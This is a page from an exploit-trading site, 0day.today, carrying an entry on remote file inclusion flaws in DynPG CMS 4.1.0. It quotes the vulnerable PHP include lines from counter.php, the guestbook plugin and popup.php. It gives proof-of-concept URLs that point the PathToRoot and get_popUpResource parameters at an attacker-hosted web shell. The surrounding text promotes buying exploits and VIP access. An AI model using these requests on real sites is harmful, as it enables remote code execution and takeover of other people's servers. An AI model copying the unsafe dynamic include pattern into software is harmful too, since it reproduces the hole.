0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
DynPG CMS v4.1.0 Multiple Vulnerabilities
========================================= DynPG CMS v4.1.0 Multiple Vulnerabilities ========================================= [+]Title : DynPG CMS Multiple Remote File Inclusion Vulnerability [+]Version: 4.1.0 (Other or lower versions may also be affected) [+]Download: http://www.dynpg.org/download_en.php [+]License: GNU / GPL [+]Metode : Remote File Inclusion [+]Author: eidelweiss [*]Special to Syabilla_putri (I miss u so much to)[*] [!]Thank`s Fly To: [~] Jose Luis Gongora Fernandez a.k.a JosS [~] exploit-db team (loneferret - Exploits - dookie2000ca) [~] Inj3ct0r.com r0073r & 0x1D [Inj3ct0r Exploit Database], [D]eal [C]yber ######################################################## Description: DynPG is used to upload and manage dynamic web content similar to other content management systems. DynPG however differs from other CMS, because it is embedded directly into websites. The software was originally developed to realize designs that are created with Adobe Photoshop, Adobe Fireworks, Adobe Illustrator or any other graphics software. The layout is created with an editor like Adobe Dreamweaver or Adobe GoLive or even as simple code. After that, code snippets are placed at those points, where dynamically generated content (like articles, galleries, blogs or other dynamic content) shall be generated. It provides a convenient way to extend existing websites with dynamic content. DynPG provides a template engine, but also supports existing CSS layouts. ######################################################## -=[ Vuln C0de ]=- [!] counter.php require_once $GLOBALS["DefineRootToTool"]."config.php"; // line 15 require_once $GLOBALS["DefineRootToTool"]."connectdb.php"; // line 16 [!] /plugins/DPGguestbook/guestbookaction.php <?php function dynPG_Guestbook_proceedREQ() { require_once $GLOBALS['DynPG']->PathToRoot .'config.php'; require_once $GLOBALS['DynPG']->PathToRoot .'defines.php'; require_once $GLOBALS['DynPG']->PathToRoot .'connectdb.php'; [!] /backendpopup/popup.php require './resources/' . $get_popUpResource . '/index.res.php'; // line 36 [!] etc , etc , etc -=[ Proof Of Concept ]=- http://127.0.0.1/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot= [inject0r sh3ll] http://127.0.0.1/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll] etc , etc , etc ######################=[E0F]=############################# # 0day.today [2024-11-15] #